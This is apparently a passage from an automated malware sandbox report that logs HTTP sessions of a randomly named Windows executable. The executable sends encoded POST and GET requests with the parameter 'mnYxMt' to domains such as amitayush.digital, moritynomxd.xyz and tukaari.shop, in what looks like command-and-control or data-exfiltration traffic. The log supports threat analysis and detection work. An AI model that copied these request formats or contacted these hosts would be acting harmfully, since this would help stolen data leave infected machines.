                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:38 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            42192.168.2.853756142.250.185.179806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:39.898668051 CET829OUTPOST /5ab9/ HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.amitayush.digital
                                                                                                                                                            Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 78 53 37 75 79 4c 44 52 6a 34 53 6d 63 78 68 6c 71 58 59 48 31 44 72 4a 4c 49 4c 4c 33 2b 6c 35 71 75 43 67 37 45 35 78 71 32 52 6a 2b 67 70 72 6c 6d 57 68 58 4e 43 6b 34 75 30 6e 61 52 72 30 4d 62 4f 55 7a 67 42 2b 54 2b 66 74 2b 67 42 37 66 78 39 58 68 72 72 65 79 50 31 78 56 58 58 4d 77 41 76 41 2b 37 41 56 38 54 55 58 79 68 33 52 4a 56 2b 45 30 33 61 74 67 77 4f 4d 67 61 38 6a 76 4b 74 4d 74 68 72 5a 7a 62 4c 79 44 58 6b 68 2b 73 34 39 65 49 69 31 54 32 64 2b 78 4f 48 67 76 54 43 77 6b 34 47 59 64 62 75 50 48 30 79 47 37 4a 70 47 44 62 43 64 4c 45 46 65 64 6d 2f 79 57 44 72 53 6f 58 2b 30 4d 32 67 34 4c 45 42 35
                                                                                                                                                            Data Ascii: mnYxMt=cI34pYOAGglcxS7uyLDRj4SmcxhlqXYH1DrJLILL3+l5quCg7E5xq2Rj+gprlmWhXNCk4u0naRr0MbOUzgB+T+ft+gB7fx9XhrreyP1xVXXMwAvA+7AV8TUXyh3RJV+E03atgwOMga8jvKtMthrZzbLyDXkh+s49eIi1T2d+xOHgvTCwk4GYdbuPH0yG7JpGDbCdLEFedm/yWDrSoX+0M2g4LEB5
                                                                                                                                                            Nov 12, 2024 18:36:40.875412941 CET407INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:40 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            43192.168.2.853757142.250.185.179806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:42.445817947 CET1846OUTPOST /5ab9/ HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.amitayush.digital
                                                                                                                                                            Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 78 53 37 75 79 4c 44 52 6a 34 53 6d 63 78 68 6c 71 58 59 48 31 44 72 4a 4c 49 4c 4c 33 2b 39 35 71 34 65 67 37 6e 52 78 72 32 52 6a 33 41 70 71 6c 6d 58 35 58 4e 36 37 34 75 34 64 61 54 6a 30 4f 34 57 55 6b 68 42 2b 45 75 66 74 7a 41 42 32 62 78 38 4e 68 71 48 61 79 4d 64 78 56 58 58 4d 77 46 72 41 75 65 30 56 73 6a 55 49 78 68 33 56 4e 56 2b 38 30 33 43 62 67 77 4b 6d 67 72 63 6a 76 72 64 4d 68 7a 7a 5a 72 4c 4c 77 43 6e 6b 35 2b 73 45 59 65 49 76 4f 54 33 35 55 78 4d 58 67 75 69 72 52 78 61 62 42 41 74 75 4d 47 54 66 6b 7a 75 45 71 65 63 75 65 41 44 78 50 61 79 75 44 5a 53 2f 42 6c 6b 54 4c 4f 79 51 31 4d 69 63 48 57 33 59 59 69 46 6a 2b 4e 7a 4b 50 4a 33 70 6e 66 48 4c 59 42 48 6e 4c 63 61 49 56 53 4d 36 6e 70 4f 5a 47 2f 78 71 70 6c 6c 65 31 49 68 64 64 79 46 57 30 6e 72 39 33 6f 58 5a 43 52 4e 68 6c 4e 76 63 4d 62 38 66 51 53 36 6e 46 6d 30 4f 78 69 50 45 59 43 6f 63 48 31 73 6f 4e 4c 50 49 65 48 71 69 34 6f 6a 66 4b 55 37 64 63 49 49 5a [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=cI34pYOAGglcxS7uyLDRj4SmcxhlqXYH1DrJLILL3+95q4eg7nRxr2Rj3ApqlmX5XN674u4daTj0O4WUkhB+EuftzAB2bx8NhqHayMdxVXXMwFrAue0VsjUIxh3VNV+803CbgwKmgrcjvrdMhzzZrLLwCnk5+sEYeIvOT35UxMXguirRxabBAtuMGTfkzuEqecueADxPayuDZS/BlkTLOyQ1MicHW3YYiFj+NzKPJ3pnfHLYBHnLcaIVSM6npOZG/xqplle1IhddyFW0nr93oXZCRNhlNvcMb8fQS6nFm0OxiPEYCocH1soNLPIeHqi4ojfKU7dcIIZvNCKj1JzzfFy89V4GtV6A2Zl94UJLGZTRQNrlG+1rgDGOFuntnA6t4OI2ONb6ubPaPXHlE0XhJx+tBmsaghO38A51d0uWI+dtrADAkCyf26jknY/frcf7e3V0z1NC1rR1ldPLGejESPOzDjlbgRJjhkIbvT0MGpQkOUuH19W3g33lzncm5Rr6/t45FYBypsSmPv2Big/KwFRIVH5OM2X67nc1Za08qE9vEj2jnnmtIP5PufJ4wMT/xby7IuFrqAx9ZIXCA4T/GhMq8ebmJ1JcVynkyK9w90NyKgS4LHRGPGN4a8BCjgjH1LNR6uYCKS3J5JcM9mBHKWEZMknH6ypNF3uvM1QlAKg4oUEsZp7MTz6QUQinvCCcsPud7TQh5DjHg8X8a/sp2xQrPGMPDe9v+pSih7y48TNT8szTtAYRY4VYMBQzYIOpfCUfh0FlEMKwBnVecFS/UftTwwg2+vwY4FonZdonhbdN7RQZEoe4oQT+Hvj/dk+MNaw0aHYY9ynv9BQwfKByT1ze9a9LOxf/t4rmMRsEvAzeMPp1CXTIaYSGK27CCorgc6hM4ahfpX5WmgAKUZ17JO+xLrAc0gLfGqtXqdt3sGsWLpKZXgHCzIr+jhNXrXEN3sGRNmjtmtDEBYCB6KOf643sAdrbQ8Sp8MwyV/uNvm9DY [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:36:43.443495989 CET407INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:43 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            44192.168.2.853758142.250.185.179806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:44.985394001 CET542OUTGET /5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HK3o+HppIUB4jPHNr8oJc0/dyFD8r5IhzQkmiC+XTwnzrQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.amitayush.digital
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:36:45.914990902 CET567INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:45 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HK3o+HppIUB4jPHNr8oJc0/dyFD8r5IhzQkmiC+XTwnzrQ%3D%3D&TTd=yRNPZBU8fZA
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            45192.168.2.853759172.81.61.224806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:51.174268007 CET803OUTPOST /d5je/ HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.moritynomxd.xyz
                                                                                                                                                            Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 31 39 6b 38 35 49 37 42 4c 67 65 42 63 71 7a 66 65 48 47 36 4d 6f 32 44 53 63 57 75 52 39 69 44 77 48 50 69 4a 35 4f 47 75 61 79 71 66 54 50 41 35 4d 67 49 58 45 45 79 42 67 6e 2f 4f 78 6f 63 4c 31 6d 35 66 52 2f 69 54 78 6a 70 44 4e 41 53 46 2f 43 74 51 77 4d 50 33 35 4c 49 4d 65 59 71 77 38 6d 57 71 65 72 64 61 7a 4c 4b 32 47 75 67 63 32 61 30 42 76 48 37 64 30 53 6d 65 36 6e 7a 4c 48 63 2b 48 4d 6d 4a 74 78 46 4d 6e 75 49 61 5a 47 5a 31 54 38 69 6d 51 7a 37 65 4e 76 47 65 72 6b 7a 38 57 2b 77 78 44 64 7a 48 54 4e 6f 42 4e 58 64 49 79 4c 37 39 61 49 3d
                                                                                                                                                            Data Ascii: mnYxMt=uqt03LPwgzKGS19k85I7BLgeBcqzfeHG6Mo2DScWuR9iDwHPiJ5OGuayqfTPA5MgIXEEyBgn/OxocL1m5fR/iTxjpDNASF/CtQwMP35LIMeYqw8mWqerdazLK2Gugc2a0BvH7d0Sme6nzLHc+HMmJtxFMnuIaZGZ1T8imQz7eNvGerkz8W+wxDdzHTNoBNXdIyL79aI=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            46192.168.2.853760172.81.61.224806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:53.786096096 CET823OUTPOST /d5je/ HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.moritynomxd.xyz
                                                                                                                                                            Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 55 74 6b 36 65 6b 37 4a 4c 67 52 50 38 71 7a 52 2b 48 4b 36 4d 6b 32 44 51 77 34 75 43 4a 69 44 51 33 50 77 64 74 4f 44 75 61 79 2b 50 53 45 4f 5a 4d 72 49 58 34 4d 79 42 73 6e 2f 4f 6c 6f 63 4c 46 6d 36 6f 46 34 68 6a 78 68 79 7a 4e 43 66 6c 2f 43 74 51 77 4d 50 32 4a 78 49 4d 47 59 71 41 73 6d 52 2b 4b 73 54 36 7a 49 64 47 47 75 33 4d 32 47 30 42 76 6c 37 64 45 34 6d 63 79 6e 7a 4f 37 63 2b 54 59 68 51 64 78 48 52 58 76 70 4b 62 7a 58 79 54 55 56 73 67 2f 2f 66 73 66 35 62 64 4a 5a 6d 30 32 32 79 44 31 59 48 51 6c 65 45 36 4b 31 53 52 62 4c 6a 4e 64 73 2b 69 37 55 55 61 42 75 7a 33 54 42 61 42 58 4c 50 47 4d 4f
                                                                                                                                                            Data Ascii: mnYxMt=uqt03LPwgzKGSUtk6ek7JLgRP8qzR+HK6Mk2DQw4uCJiDQ3PwdtODuay+PSEOZMrIX4MyBsn/OlocLFm6oF4hjxhyzNCfl/CtQwMP2JxIMGYqAsmR+KsT6zIdGGu3M2G0Bvl7dE4mcynzO7c+TYhQdxHRXvpKbzXyTUVsg//fsf5bdJZm022yD1YHQleE6K1SRbLjNds+i7UUaBuz3TBaBXLPGMO


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            47192.168.2.853761172.81.61.224806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:56.335053921 CET1840OUTPOST /d5je/ HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.moritynomxd.xyz
                                                                                                                                                            Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 55 74 6b 36 65 6b 37 4a 4c 67 52 50 38 71 7a 52 2b 48 4b 36 4d 6b 32 44 51 77 34 75 43 52 69 44 6a 50 50 69 76 46 4f 41 75 61 79 69 2f 53 48 4f 5a 4d 32 49 54 55 49 79 42 77 33 2f 4e 64 6f 64 71 6c 6d 2f 63 70 34 32 7a 78 68 74 44 4e 48 53 46 2f 4c 74 51 67 49 50 33 31 78 49 4d 47 59 71 47 49 6d 48 36 65 73 44 4b 7a 4c 4b 32 47 79 67 63 32 36 30 42 33 55 37 5a 59 43 6d 4e 53 6e 79 75 4c 63 37 67 77 68 50 74 78 4a 51 58 76 4c 4b 62 76 63 79 54 59 5a 73 6a 6a 56 66 72 7a 35 59 5a 31 47 7a 56 4f 68 6b 77 51 72 45 52 39 69 44 35 4c 52 62 41 2b 2b 75 66 45 4c 79 46 33 75 42 63 35 46 2f 33 61 52 44 33 76 6b 4d 44 56 64 51 50 53 4d 51 34 6a 55 34 78 58 37 68 31 52 76 37 57 63 77 78 54 73 71 68 76 55 62 38 39 37 78 78 46 2f 54 48 67 68 63 69 6d 6f 66 39 45 42 2f 4a 68 73 59 6f 64 58 45 6e 36 2f 6f 66 68 52 6d 65 66 52 4a 48 75 6e 69 5a 45 4c 4c 48 4d 49 79 51 4f 44 4f 4a 6f 6d 61 6d 4b 69 45 67 66 52 4e 51 46 70 6a 30 53 69 4d 4e 2f 71 57 6b 53 55 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=uqt03LPwgzKGSUtk6ek7JLgRP8qzR+HK6Mk2DQw4uCRiDjPPivFOAuayi/SHOZM2ITUIyBw3/Ndodqlm/cp42zxhtDNHSF/LtQgIP31xIMGYqGImH6esDKzLK2Gygc260B3U7ZYCmNSnyuLc7gwhPtxJQXvLKbvcyTYZsjjVfrz5YZ1GzVOhkwQrER9iD5LRbA++ufELyF3uBc5F/3aRD3vkMDVdQPSMQ4jU4xX7h1Rv7WcwxTsqhvUb897xxF/THghcimof9EB/JhsYodXEn6/ofhRmefRJHuniZELLHMIyQODOJomamKiEgfRNQFpj0SiMN/qWkSU6NIOObhZEPG1j+/Pd75rdKFuWL+G055wUMciYUlW+Uc6ohgkHDYa7doxco05UEhcd1fxCaFSTtPQyHs1CWStJgwjrGpeZ5VAfSZoDbojpAvB55wgSwz+SiBZFgfGxkP23rjKDNqQi5Ps8GFwy4mA+QP9Pmxhamm4GTvbihOMqCrxIb1OV+fMadx9e5ZiZRl2Dmr3mZ0HETIg113b1lHFjgPe2pg9zc+2yEIcqNCVywH4EnvReTlnnJ5NMPsZJbCfoXM/4tIxEngZa6WmIYTrLOMsp3e96hEIsipi2NLqBfcStw92ayvtxG2/ih2bq9kMyDc49aRIBg7eSvdTTHU8Z/U+L1WmB3OSoP7d3MJ/3P20trkhrix4ILluSkz/7ESFTm/a6bgT/bemh/OqfactOsCyFEgNkK1zJZdIB//XSMgmAMlF+Qbio2h4Flr1mxoy+dS1gvZyZJ2hf7fUi5l5LG4WkhHXcc6bXw8tsW5G5V0PacT7+5KzgZDAq3JYDP5RXUbxyzzrw6nHy2SE73Lb3GnTcmp1S6zTZ4KsNJ2NWivOLtbOzq6q/mubfPegQpV2+2Uy0Q1jTE+mQIrmFVKGG14tV7zL6f7fHiwMb67ZQBlTe84shaRKmBe5qJXrmXcfeszu7Wp9Az5Uhnf1vb6d1e5XjEim1h6Upt [TRUNCATED]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            48192.168.2.853762172.81.61.224806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:58.900525093 CET540OUTGET /d5je/?mnYxMt=joFU07nwohD6eVof7LEAc8A6AvX4Xdan1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iBltimhMIjfcvDspXx4VIdueoAIlFt6Qc63ge1Cxn5PIrg==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            49192.168.2.8537633.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:37:12.427748919 CET794OUTPOST /h8b0/ HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tukaari.shop
                                                                                                                                                            Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 59 49 55 4b 2b 76 50 6b 6b 39 31 5a 54 70 75 34 47 62 58 56 30 44 55 34 4c 73 4b 69 57 4f 49 64 73 54 30 48 65 6a 75 69 62 72 50 4f 30 55 66 59 57 4e 37 72 4e 48 5a 36 72 35 30 66 63 62 35 63 73 67 2b 31 31 2b 62 69 32 54 68 58 6b 76 4f 4e 4c 68 51 64 78 69 49 78 36 46 63 4c 4b 79 66 62 6f 37 76 61 4b 76 50 42 61 32 45 53 39 56 4c 51 6d 69 7a 73 63 73 55 53 47 51 55 39 33 61 4c 66 79 72 51 36 4e 31 38 39 34 38 6d 35 44 37 6d 61 45 4a 7a 5a 76 43 5a 5a 6d 76 67 4a 4b 4c 37 2b 36 67 74 77 42 56 61 4a 76 79 58 50 33 76 57 52 34 56 65 74 4b 5a 36 61 6d 4e 6b 3d
                                                                                                                                                            Data Ascii: mnYxMt=OTk+zmL02FhBYIUK+vPkk91ZTpu4GbXV0DU4LsKiWOIdsT0HejuibrPO0UfYWN7rNHZ6r50fcb5csg+11+bi2ThXkvONLhQdxiIx6FcLKyfbo7vaKvPBa2ES9VLQmizscsUSGQU93aLfyrQ6N18948m5D7maEJzZvCZZmvgJKL7+6gtwBVaJvyXP3vWR4VetKZ6amNk=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            50192.168.2.8537643.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:37:14.973520994 CET814OUTPOST /h8b0/ HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tukaari.shop
                                                                                                                                                            Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 4b 37 4d 4b 38 4d 6e 6b 6a 64 31 59 63 4a 75 34 54 4c 58 52 30 45 63 34 4c 74 66 36 56 38 63 64 73 79 6f 48 66 6d 53 69 63 72 50 4f 2f 30 66 6e 62 74 37 61 4e 48 55 48 72 37 51 66 63 59 46 63 73 6c 53 31 30 4e 7a 68 77 44 68 56 78 66 4f 54 47 42 51 64 78 69 49 78 36 47 67 78 4b 79 6e 62 6f 75 6e 61 59 39 33 47 5a 32 45 56 36 56 4c 51 73 43 7a 67 63 73 55 77 47 56 4e 57 33 63 48 66 79 71 67 36 4e 6b 38 38 74 73 6d 33 48 37 6e 7a 46 62 72 4a 72 54 64 56 69 39 73 31 45 34 4c 4d 79 32 41 61 62 33 53 50 73 79 2f 6b 33 73 2b 6e 39 69 44 46 51 36 71 71 34 61 79 4c 49 54 5a 47 51 41 43 6c 69 77 36 74 66 47 55 6f 64 46 6a 33
                                                                                                                                                            Data Ascii: mnYxMt=OTk+zmL02FhBK7MK8Mnkjd1YcJu4TLXR0Ec4Ltf6V8cdsyoHfmSicrPO/0fnbt7aNHUHr7QfcYFcslS10NzhwDhVxfOTGBQdxiIx6GgxKynbounaY93GZ2EV6VLQsCzgcsUwGVNW3cHfyqg6Nk88tsm3H7nzFbrJrTdVi9s1E4LMy2Aab3SPsy/k3s+n9iDFQ6qq4ayLITZGQACliw6tfGUodFj3


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            51192.168.2.8537653.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:37:17.524045944 CET1831OUTPOST /h8b0/ HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tukaari.shop
                                                                                                                                                            Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
